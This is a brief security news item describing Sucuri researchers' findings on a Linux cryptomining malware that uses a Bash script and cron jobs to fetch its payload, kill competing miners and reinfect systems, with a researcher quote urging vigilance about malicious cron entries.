A cryptomining malware was spotted by security researchers that leveraged cron scheduler. Researchers from the security firm Sucuri analyzed a Bash script linked with the malware, which downloaded its payload and configuration files into the system.
It was found that this script terminated other cryptomining processes in the infected system before running its own and used cron commands for evading detection, and reinfection.
How does it work?
Sucuri researchers suggest that the malware affects desktop installations on top of web servers, and advise users to stay aware of malicious cron processes.
“If you overlook a malicious cronjob, it can reinfect your environment until it’s mitigated. It’s also important to remember that it’s not just web servers that are targeted — it can also infect desktop installations of 32/64bit Linux systems and other variants, which are used to infect Windows installations,” the researchers explained.